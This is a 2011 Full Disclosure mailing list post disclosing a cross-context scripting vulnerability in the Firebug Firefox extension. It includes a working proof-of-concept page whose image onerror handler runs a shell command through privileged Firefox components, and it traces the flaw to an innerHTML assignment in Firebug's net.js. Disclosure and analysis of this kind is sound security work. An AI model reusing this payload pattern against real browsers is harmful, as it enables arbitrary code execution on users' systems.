Full Disclosure mailing list archives
Firebug Firefox Extension Cross Context Scripting Vulnerability
From: IEhrepus <5up3rh3i () gmail com>
Date: Sun, 19 Jun 2011 05:35:53 -0700
http://www.80vul.com/firefox/Firebug%20Firefox%20Extension%20Cross%20Context%20Scripting%20Vulnerability.htm *Firebug Firefox Extension Cross Context Scripting Vulnerability* Author: www.80vul.com [Email:5up3rh3i#gmail.com] 2011/06/18 - Public Disclosure *Description* 80vul.com discovered firebug that a famous firefox extension is vulnerable to Cross Context Scripting, and this vul can execute evil codz in the chrome privileged Firefox zone.so successful exploitation allows execution of arbitrary code in user’s system. *Exploitation* a demo : http://www.80vul.com/firefox/firebug0day.htm <html> <head>firebug 0day</head> <body> <img src=2 onerror='var file = Components.classes["@mozilla.org/file/local;1 "].createInstance(Components.interfaces.nsILocalFile);file.initWithPath ("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"]. createInstance(Components.interfaces.nsIProcess);process.init(file);var args= ["-c", " gcalctool"];process.run(false, args, args.length);'></img> </body> </html> Open the firebug, and visite the exploit's URL, then open "NET" -->URL-->"HTML" , and gcalctool is executed. *Analysis* extract the code from firebug () software joehewitt com xpi by rar or zip . then let’s go ... 80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./ firebug () software joehewitt com/ --colour ./firebug () software joehewitt com/content/firebug/traceModule.js:1128: iframe.contentWindow.document.body.innerHTML = text; ./firebug () software joehewitt com/content/firebug/net.js:2561: iframe.contentWindow.document.body.innerHTML = text; 80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./ firebug () software joehewitt com/content/firebug/net.js --colour -8 2553- } 2554- 2555- if (hasClass(tab, "netInfoHtmlTab") && file.loaded && ! netInfoBox.htmlPresented) 2556- { 2557- netInfoBox.htmlPresented = true; 2558- 2559- var text = Utils.getResponseText(file, context); 2560- var iframe = netInfoBox.getElementsByClassName(" netInfoHtmlPreview").item(0); 2561: iframe.contentWindow.document.body.innerHTML = text; 2562- } 2563- 2564- // Notify listeners about update so, content of custom tabs can be updated. 2565- dispatch(NetInfoBody.fbListeners, "updateTabBody", [netInfoBox, file, context]); 2566- }, 2567- 2568- setResponseText: function(file, netInfoBox, responseTextBox, context) 2569- { edit the content/firebug/net.js and seach "netInfoHtmlTab": 80vul@ubuntu:~$ gedit ./ firebug () software joehewitt com/content/firebug/net.js Firebug.NetMonitor.NetInfoBody = domplate(Firebug.Rep, new Firebug.Listener (), { tag: DIV({"class": "netInfoBody", _repObject: "$file"}, TAG("$infoTabs", {file: "$file"}), TAG("$infoBodies", {file: "$file"}) ), infoTabs: DIV({"class": "netInfoTabs focusRow subFocusRow", "role": "tablist "}, A({"class": "netInfoParamsTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Params", $collapsed: "$file|hideParams"}, $STR("URLParameters") ), A({"class": "netInfoHeadersTab netInfoTab a11yFocus", onclick: "$onClickTab", "role": "tab", view: "Headers"}, $STR("Headers") ), A({"class": "netInfoPostTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Post", $collapsed: "$file|hidePost"}, $STR("Post") ), A({"class": "netInfoPutTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Put", $collapsed: "$file|hidePut"}, $STR("Put") ), A({"class": "netInfoResponseTab netInfoTab a11yFocus", onclick: "$onClickTab", "role": "tab", view: "Response", $collapsed: "$file|hideResponse"}, $STR("Response") ), A({"class": "netInfoCacheTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Cache", $collapsed: "$file|hideCache"}, $STR("Cache") ), A({"class": "netInfoHtmlTab netInfoTab a11yFocus", onclick: "$ onClickTab", "role": "tab", view: "Html", $collapsed: "$file|hideHtml"}, $STR("HTML") ) ), hitest
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Firebug Firefox Extension Cross Context Scripting Vulnerability IEhrepus (Jun 19)
- Re: Firebug Firefox Extension Cross Context Scripting Vulnerability dveditz (Jun 21)